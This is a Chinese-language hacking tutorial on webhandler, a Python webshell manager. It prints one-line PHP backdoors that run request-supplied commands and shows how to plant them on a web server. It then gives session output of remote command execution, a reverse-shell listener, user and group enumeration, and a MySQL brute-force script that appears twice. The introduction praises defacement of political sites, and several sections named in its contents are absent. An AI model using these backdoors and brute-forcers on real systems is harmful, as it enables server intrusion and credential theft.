Linux下的”菜刀” – webhandler
介绍
使用
安装
客服端使用
GET提交
POST提交
监听功能
获得系统信息
暴力破解MYSQL
暴力FTP
查看用户组
下载文件
执行本地命令
上传文件
反弹Msf TCP SHELL
参考
前言
教学文档的342课,说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand/Helen_Sb/HOW/TO/MAKE/LOVE
等等,当初在六七年前*闹独立的时候,他在*和民进党的网站上留下了“只有一个中国”的黑页,一举成名。
作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。
你见过很强大的ASP后门,很强大的PHP后门,很强大的ASPX后门,那你见过很强大的asp,aspx,php三合一后门么……..,没有吧,尤其是这个后门,只有一句话。
是不是很震憾,很不可思议,是的,我刚接触的时候,也是这样的想法,就这三句话,一个名不见经传的“中国菜刀”,就可以代替我那搜集了几年,大大小小几百个多种平台多种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可以代替那些后门,而且他的功能超出我的想象,没试过 菜刀 FOR WINE,不知道能否在LINUX下运行,不过有个类似的工具 webhandler , 脚本:PYTHON
介绍
他指出POST 和 GET的提交方式,只支持PHP脚本运行 客服端:
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
使用
安装
root@Dis9Team:/pen/door# wget http://dis9-server.googlecode.com/files/webhandler.zip
root@Dis9Team:/pen/door# unzip webhandler.zip
root@Dis9Team:/pen/door# cd webhandler
root@Dis9Team:/pen/door/webhandler# apt-get install python-setuptools
root@Dis9Team:/pen/door/webhandler# easy_install argparse
客服端使用
GET提交
root@ubuntu:/var/www# echo '<?php system($_GET['cmd']); ?>' > /var/www/get.php
链接
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/get.php?cmd=
________ __ _______ __ __
| | | |.-----.| |--.| | |.---.-.-----.--| | |.-----.----.
| | | || -__|| _ || || _ | | _ | || -__| _|
|________||_____||_____||___|___||___._|__|__|_____|__||_____|__|
-------------------------------------------------------------------------
[!] "non-git". Keep up-to-date by running '--update'
-----------------------------------------------------------
User : www-data
ID : uid=33(www-data) gid=33(www-data) groups=33(www-data)
Kernel : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
CWD : /var/www drwxrwxrwx
Uptime : 4 minutes
Target's IPs : 5.5.5.3
Our IP : 174.139.7.227
---------------------------------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
www-data@5.5.5.3:~(/var/www):$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@5.5.5.3:~(/var/www):$
POST提交
root@ubuntu:/var/www# echo '<?php echo exec($_POST['cmd']); ?>' > post.php
链接
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --url http://5.5.5.3/post.php --method POST --parameter cmd
__ __ _ _ _ _ _
\ \ / / | | | | | | | | |
\ \ /\ / /__| |__ | |__| | __ _ _ __ __| | | ___ _ __
\ \/ \/ / _ \ '_ \| __ |/ _` | '_ \ / _` | |/ _ \ '__|
\ /\ / __/ |_) | | | | (_| | | | | (_| | | __/ |
\/ \/ \___|_.__/|_| |_|\__,_|_| |_|\__,_|_|\___|_|
-----------------------------------------------------------
[!] "non-git". Keep up-to-date by running '--update'
-----------------------
User : 5.5.5.3
ID : Unknown
Kernel : Unknown
CWD : Unknown Unknown
Uptime : Unknown
Target's IPs : Unknow
Our IP : 174.139.7.227
-----------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
5.5.5.3@Unknow:~(Unknown):$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
5.5.5.3@Unknow:~(Unknown):$
监听功能
先监听端口
root@Dis9Team:/pen/door/webhandler# python2.7 webhandler.py --listen 1234
[!] "non-git". Keep up-to-date by running '--update'
[i] Waiting on port: 1234
运行PHP REVER SHELL 获得SHELL
获得系统信息
# root@5.5.5.3:~(/var/www):$ @info
----------------------------------------------------------
User : root
ID : uid=0(root) gid=0(root) groups=0(root)
Kernel : Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
CWD : /var/www drwxrwxrwx
Uptime : 11 minutes
Target's IPs : 5.5.5.3
Our IP : 174.139.7.227
--------------------------------------------------------
[+] Available commands: @backdoor, @download, @enum, @history, @info, @update, @upload, @brute, clear, exit
[+] Inserting ! at the begining of the command will execute the command locally (on your box)
root@5.5.5.3:~(/var/www):$
暴力破解MYSQL
默认字典: modules/bruters/wordlist.txt,他会自动上传
这个东西有点占用进程.而且还是单线程 小心使用
核心代码
#!/usr/bin/env php
<?php
error_reporting(0);
$host = "127.0.0.1";
$user_dict = "wordlist.txt";
$pass_dict = "wordlist.txt";
$userFile = file($user_dict);
$passFile = file($pass_dict);
$success;
foreach ($userFile as $user) {
if ($success == 1) {
break;
}
foreach ($passFile as $pass) {
$user = trim($user);
$pass = trim($pass);
$connection = mysql_connect($host, $user, $pass);
if ($connection) {
echo "success:" . $user . ":" . $pass . "\n";
$success = 1;
mysql_close($connection);
break;
}
}
}
?>
#!/usr/bin/env php
<?php
error_reporting(0);
$host = "127.0.0.1";
$user_dict = "wordlist.txt";
$pass_dict = "wordlist.txt";
$userFile = file($user_dict);
$passFile = file($pass_dict);
$success;
foreach ($userFile as $user) {
if ($success == 1) {
break;
}
foreach ($passFile as $pass) {
$user = trim($user);
$pass = trim($pass);
$connection = mysql_connect($host, $user, $pass);
if ($connection) {
echo "success:" . $user . ":" . $pass . "\n";
$success = 1;
mysql_close($connection);
break;
}
}
}
?>
暴力FTP
一样
5.5.5.3@Unknow:~(Unknown):$ @brute ftp
查看用户组
5.5.5.3@Unknow:~(Unknown):$ @enum group
[+] Total number of groups: 1
-------------------------------------------------------
Group Name | Password | Group ID | Group List |
-------------------------------------------------------
honeyd | *In shadow* | 115 | |
-------------------------------------------------------
5.5.5.3@Unknow:~(Unknown):$ @enum passwd
[+] Total number of users: 1
----------------------------------
Username | Password | User ID | Group ID | User Info | Home Directory | Shell
----------------------------------------------------------------
b | *In shadow* | 1004 | 33 | | /dev/null | /usr/sbin/nologin
--------------------------------------------------------------
5.5.5.3@Unknow:~(Unknown):$
貌似是个蜜罐 哈哈哈